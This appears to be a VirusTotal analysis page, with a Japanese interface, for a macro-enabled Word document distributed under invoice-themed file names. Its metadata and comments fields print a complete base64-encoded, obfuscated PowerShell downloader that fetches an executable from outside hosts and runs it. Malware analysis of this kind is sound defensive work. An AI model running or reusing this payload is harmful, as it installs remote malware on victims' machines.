× Cookie が無効になっています。 このサイトを正しく動作させるには、Cookie を有効にする必要があります
SHA256: 6bf1ec3bc2f0a97bdca700f02a99db02543fc00e6e9e88bbc444e56c4f74dfc5
ファイル名: BNCKKK930.doc
検出率: 1 / 58
分析日時: 2017-07-31 05:51:49 UTC (1 年, 9 ヶ月前) 最新を表示
ウイルス対策ソフト 結果 更新日
TrendMicro HEUR_VBA.O2 20170731
Ad-Aware 20170731
AegisLab 20170731
AhnLab-V3 20170731
Alibaba 20170731
ALYac 20170731
Antiy-AVL 20170731
Arcabit 20170731
Avast 20170731
AVG 20170731
Avira (no cloud) 20170730
AVware 20170731
Baidu 20170728
BitDefender 20170731
Bkav 20170729
CAT-QuickHeal 20170731
ClamAV 20170731
CMC 20170731
Comodo 20170731
CrowdStrike Falcon (ML) 20170710
Cylance 20170731
Cyren 20170731
DrWeb 20170731
Emsisoft 20170731
Endgame 20170721
ESET-NOD32 20170731
F-Prot 20170731
F-Secure 20170731
Fortinet 20170731
GData 20170731
Ikarus 20170730
Sophos ML 20170607
Jiangmin 20170731
K7AntiVirus 20170731
K7GW 20170731
Kaspersky 20170731
Kingsoft 20170731
Malwarebytes 20170731
MAX 20170731
McAfee 20170731
McAfee-GW-Edition 20170731
Microsoft 20170730
eScan 20170731
NANO-Antivirus 20170731
nProtect 20170731
Palo Alto Networks (Known Signatures) 20170731
Panda 20170730
Qihoo-360 20170731
Rising 20170731
SentinelOne (Static ML) 20170718
Sophos AV 20170731
SUPERAntiSpyware 20170731
Symantec 20170731
Symantec Mobile Insight 20170730
Tencent 20170731
TheHacker 20170730
TrendMicro-HouseCall 20170731
Trustlook 20170731
VBA32 20170728
VIPRE 20170731
ViRobot 20170731
Webroot 20170731
WhiteArmor 20170730
Yandex 20170728
Zillya 20170728
ZoneAlarm by Check Point 20170731
Zoner 20170731
The file being studied follows the Compound Document File format! More specifically, it is a MS Word Document file.
Commonly abused properties
The studied file makes use of macros, a macro is a series of commands and instructions that you group together as a single command to accomplish a task automatically. Macros are often abused to perform malicious tasks when working with a document.
May create OLE objects.
Summary
creation_datetime
2017-07-30 21:07:00
revision_number
1
page_count
1
last_saved
2017-07-30 21:08:00
template
Normal.dotm
application_name
Microsoft Office Word
character_count
1
code_page
Latin I
comments
JAB7AHcAcwBgAGMAYABSAGkAcAB0AH0AIAA9ACAAJgAoACIAewAxAH0AewAwAH0AewAyAH0AIgAgAC0AZgAgACcAZQAnACwAJwBuACcALAAnAHcALQBvAGIAagBlAGMAdAAnACkAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAKAAiAHsAMAB9AHsAMwB9AHsAMQB9AHsAMgB9ACIALQBmACAAJwBXAFMAYwByACcALAAnAC4AUwBoACcALAAnAGUAbABsACcALAAnAGkAcAB0ACcAKQA7ACQAewB3AGUAYABCAEMAYABsAEkARQBOAHQAfQAgAD0AIAAmACgAIgB7ADAAfQB7ADMAfQB7ADEAfQB7ADIAfQAiAC0AZgAgACcAbgBlAHcALQBvAGIAJwAsACcAYwAnACwAJwB0ACcALAAnAGoAZQAnACkAIAAoACIAewAxAH0AewAzAH0AewAyAH0AewAwAH0AIgAgAC0AZgAnAGwAaQBlAG4AdAAnACwAJwBTAHkAcwB0AGUAbQAnACwAJwAuAFcAZQBiAEMAJwAsACcALgBOAGUAdAAnACkAOwAkAHsAUgBBAE4AYABEAGAATwBNAH0AIAA9ACAAJgAoACIAewAxAH0AewAzAH0AewAyAH0AewAwAH0AIgAgAC0AZgAnAHQAJwAsACcAbgBlAHcALQBvACcALAAnAGoAZQBjACcALAAnAGIAJwApACAAKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIALQBmACAAJwByAGEAbgBkACcALAAnAG8AJwAsACcAbQAnACkAOwAkAHsAVQBgAFIATABTAH0AIAA9ACAAKAAiAHsAMwAxAH0AewAxADcAfQB7ADUAfQB7ADQAMAB9AHsAMgA4AH0AewAxADAAfQB7ADEAMgB9AHsAOAB9AHsAMwAyAH0AewAyADIAfQB7ADIANwB9AHsAMwAzAH0AewAxADgAfQB7ADMANgB9AHsAMQA2AH0AewAyADQAfQB7ADMANwB9AHsAMgAwAH0AewAwAH0AewAxADMAfQB7ADMAOQB9AHsAMgAxAH0AewAyADYAfQB7ADEANQB9AHsAMwB9AHsAMQB9AHsAMwA4AH0AewAxADQAfQB7ADQAfQB7ADIANQB9AHsANgB9AHsAMQAxAH0AewA3AH0AewAyADkAfQB7ADIAMwB9AHsAMwA0AH0AewAxADkAfQB7ADkAfQB7ADIAfQB7ADMAMAB9AHsAMwA1AH0AIgAtAGYAJwAvACcALAAnAGgAdAB0AHAAOgAvAC8AYwBzACcALAAnAG8AcgAuAGMAYQAvACcALAAnAEsALwAsACcALAAnAGUALgBlACcALAAnAHkAcwAnACwAJwBTAEEAcgAnACwAJwByAC8AJwAsACcALwAnACwAJwBkAG8AYwB0ACcALAAnACwAaAB0AHQAcAA6AC8ALwBwAGEAdQBsACcALAAnAEQAJwAsACcAcABsAHUAcwBhAC4AYwBvAG0AJwAsACcAYwAnACwAJwAuAHMAYQBuAGYAcgAnACwAJwBzACcALAAnAGUAcABoAGMAJwAsACcAdAB0AHAAOgAvAC8AbQBhAGMAcwAnACwAJwBvACcALAAnAHQAJwAsACcAYwBvAG0AJwAsACcAUwBWACcALAAnAGkAWQBLAEoARgBJAHUAJwAsACcAaAB0AHQAcAA6ACcALAAnAG8AJwAsACcAdQAvAFAAJwAsACcAdwAnACwAJwBqAC8ALABoAHQAdABwADoALwAnACwAJwBaAEMAeQAvACcALAAnACwAJwAsACcAagBnAGEAZQAnACwAJwBoACcALAAnAGoAVQAnACwAJwAvAGoAJwAsACcALwAvAGkAJwAsACcAUQAvACcALAAnAHMAJwAsACcAbgBzAHQALgAnACwAJwAtAHMAawBpAGwAdQBqACcALAAnAEIAeQBOACcALAAnAC4AYwBhAC8AWgBRAFIAJwApAC4AKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBwAGwAaQB0ACcALAAnAFMAJwApAC4ASQBuAHYAbwBrAGUAKAAnACwAJwApADsAJAB7AE4AYABBAG0AZQB9ACAAPQAgACQAewByAGAAQQBOAGQATwBtAH0ALgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHgAdAAnACwAJwBuAGUAJwApAC4ASQBuAHYAbwBrAGUAKAAxACwAIAA2ADUANQAzADYAKQA7ACQAewBQAGAAQQB0AEgAfQAgAD0AIAAkAHsARQBgAE4AVgA6AGAAVABlAE0AcAB9ACAAKwAgACcAXAAnACAAKwAgACQAewBuAGEAYABtAEUAfQAgACsAIAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAC4AZQAnACwAJwB4AGUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAewB1AGAAUgBsAH0AIABpAG4AIAAkAHsAdQBgAFIAbABTAH0AKQB7AHQAcgB5AHsAJAB7AFcAYABlAEIAYABDAGwASQBlAGAATgB0AH0ALgAoACIAewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAgACcARABvAHcAbgBsAG8AYQAnACwAJwBlACcALAAnAGQARgBpAGwAJwApAC4ASQBuAHYAbwBrAGUAKAAkAHsAVQBgAFIATAB9AC4AKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIAIAAtAGYAIAAnAFQAbwAnACwAJwBTAHQAcgBpACcALAAnAG4AZwAnACkALgBJAG4AdgBvAGsAZQAoACkALAAgACQAewBQAGAAQQBUAEgAfQApADsALgAoACIAewA0AH0AewAzAH0AewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAnAHIAdAAnACwAJwBlAHMAcwAnACwAJwAtAFAAcgBvAGMAJwAsACcAdABhACcALAAnAFMAJwApACAAJAB7AFAAYABBAHQAaAB9ADsAYgByAGUAYQBrADsAfQBjAGEAdABjAGgAewAmACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAHMAJwAsACcAdwByAGkAdABlAC0AaABvACcALAAnAHQAJwApACAAJAB7AF8AfQAuACIAZQB4AGMARQBQAGAAVABgAGkAbwBuACIALgAiAE0AZQBzAGAAUwBhAGAARwBlACIAOwB9AH0ADQAKAA==
Document summary
byte_count
57856
characters_with_spaces
1
line_count
1
version
1048576
paragraph_count
1
code_page
Latin I
OLE Streams
name
Root Entry
clsid
00020906-0000-0000-c000-000000000046
type_literal
root
clsid_literal
MS Word
sid
0
size
5632
type_literal
stream
sid
14
name
\x01CompObj
size
114
type_literal
stream
sid
5
name
\x05DocumentSummaryInformation
size
4096
type_literal
stream
sid
4
name
\x05SummaryInformation
size
4096
type_literal
stream
sid
2
name
1Table
size
6951
type_literal
stream
sid
1
name
Data
size
21670
type_literal
stream
sid
12
name
Macros/PROJECT
size
412
type_literal
stream
sid
13
name
Macros/PROJECTwm
size
65
type_literal
stream
sid
9
type
macro
name
Macros/VBA/Module1
size
6798
type_literal
stream
sid
10
type
macro (only attributes)
name
Macros/VBA/ThisDocument
size
924
type_literal
stream
sid
11
name
Macros/VBA/_VBA_PROJECT
size
3383
type_literal
stream
sid
8
name
Macros/VBA/dir
size
572
type_literal
stream
sid
3
name
WordDocument
size
4096
Macros and VBA code streams
[+] Module1.bas Macros/VBA/Module1 2636 bytes
create-ole
ExifTool file metadata
ChNkfvLeBO
-e

SharedDoc
No

HyperlinksChanged
No

DhJcmCFoaj
hell

System
Windows

LinksUpToDate
No

HeadingPairs
Title, 1

Identification
Word 8.0

Template
Normal.dotm

CharCountWithSpaces
1

Word97
No

LanguageCode
English (US)

CompObjUserType
Microsoft Word 97-2003 Document

ModifyDate
2017:07:30 19:08:00

GWnIbjmzJs
pow

AUhRDVFTPp
WScr

Characters
1

TodvXKQqYD
ers

CodePage
Windows Latin 1 (Western European)

RevisionNumber
1

MIMEType
application/msword

Words
0

Bytes
57856

CreateDate
2017:07:30 19:07:00

Lines
1

AppVersion
16.0

VsSQkWCjXD
ipt.S

Security
None

IDipRNuhMAGz
RPRPRPRPRP

Software
Microsoft Office Word

FileType
DOC

TotalEditTime
0

Pages
1

ScaleCrop
No

CompObjUserTypeLen
32

FileTypeExtension
doc

Paragraphs
1

LastPrinted
0000:00:00 00:00:00

DocFlags
Has picture, 1Table, ExtChar

File identification
MD5 27ec07cc6604112df505132903b6c1cd
SHA1 0bd7cde78ceb718b6c656461e8a69a25a29d64a1
SHA256 6bf1ec3bc2f0a97bdca700f02a99db02543fc00e6e9e88bbc444e56c4f74dfc5
ssdeep
768:auK9MokqFlWkNefm3yFXIH25Y8tXXevyh:aBuoBrJk6yFYH222

File size 56.5 KB ( 57856 bytes )
File type MS Word Document
Magic literal
CDF V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Comments: JAB7AHcAcwBgAGMAYABSAGkAcAB0AH0AIAA9ACAAJgAoACIAewAxAH0AewAwAH0AewAyAH0AIgAgAC0AZgAgACcAZQAnACwAJwBuACcALAAnAHcALQBvAGIAagBlAGMAdAAnACkAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAKAAiAHsAMAB9AHsAMwB9AHsAMQB9AHsAMgB9ACIALQBmACAAJwBXAFMAYwByACcALAAnAC4AUwBoACcALAAnAGUAbABsACcALAAnAGkAcAB0ACcAKQA7ACQAewB3AGUAYABCAEMAYABsAEkARQBOAHQAfQAgAD0AIAAmACgAIgB7ADAAfQB7ADMAfQB7ADEAfQB7ADIAfQAiAC0AZgAgACcAbgBlAHcALQBvAGIAJwAsACcAYwAnACwAJwB0ACcALAAnAGoAZQAnACkAIAAoACIAewAxAH0AewAzAH0AewAyAH0AewAwAH0AIgAgAC0AZgAnAGwAaQBlAG4AdAAnACwAJwBTAHkAcwB0AGUAbQAnACwAJwAuAFcAZQBiAEMAJwAsACcALgBOAGUAdAAnACkAOwAkAHsAUgBBAE4AYABEAGAATwBNAH0AIAA9ACAAJgAoACIAewAxAH0AewAzAH0AewAyAH0AewAwAH0AIgAgAC0AZgAnAHQAJwAsACcAbgBlAHcALQBvACcALAAnAGoAZQBjACcALAAnAGIAJwApACAAKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIALQBmACAAJwByAGEAbgBkACcALAAnAG8AJwAsACcAbQAnACkAOwAkAHsAVQBgAFIATABTAH0AIAA9ACAAKAAiAHsAMwAxAH0AewAxADcAfQB7ADUAfQB7ADQAMAB9AHsAMgA4AH0AewAxADAAfQB7ADEAMgB9AHsAOAB9AHsAMwAyAH0AewAyADIAfQB7ADIANwB9AHsAMwAzAH0AewAxADgAfQB7ADMANgB9AHsAMQA2AH0AewAyADQAfQB7ADMANwB9AHs, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Sat Jul 29 20:07:00 2017, Last Saved Time/Date: Sat Jul 29 20:08:00 2017, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0

TrID Microsoft Word document (54.2%)
Microsoft Word document (old ver.) (32.2%)
Generic OLE2 / Multistream Compound File (13.5%)
Tags
macros doc create-ole

VirusTotal metadata
First submission 2017-07-31 03:20:26 UTC (1 年, 9 ヶ月前)
Last submission 2018-07-12 10:31:52 UTC (10 ヶ月, 2 週間前)
ファイル名 #67713 Invoice Notice.doc
New invoice #99590.doc
Invoice #820567.doc
Invoice 00001.doc
Invoice #25196.doc
Invoice #5111 Message.doc
Invoice #97412 Message.doc
New invoice #97882.doc
Invoice #080784.doc
New invoice - 047952.doc
Invoice number 232567 Notification.doc
Invoice due number 007556.doc
Copy Invoice 125206.doc
Invoice #4807 Message.doc
#278605 Invoice Notice.doc
New invoice #31900.doc
Invoice number 05637 Notification.doc
Invoice 1997.doc
Invoice #953193 Message.doc
Invoice number 62817 Notification.doc
Invoice due number 63682.doc
Invoice #50577.doc
Invoice #9748.doc
#41255 Invoice Notice.doc
Invoice number 61718 Notification.doc
コメントはありません. この項目について、VirusTotal コミュニティのメンバーはまだ誰もコメントしていません。是非、コメントしてください。

コメントを投稿してください...

?
コメントを投稿

サインインしていません。登録ユーザーのみがコメントを投稿できます。サインインして意見をお聞かせください。

投票はありません. この項目に対してまだ誰も投票していません。是非、投票してください。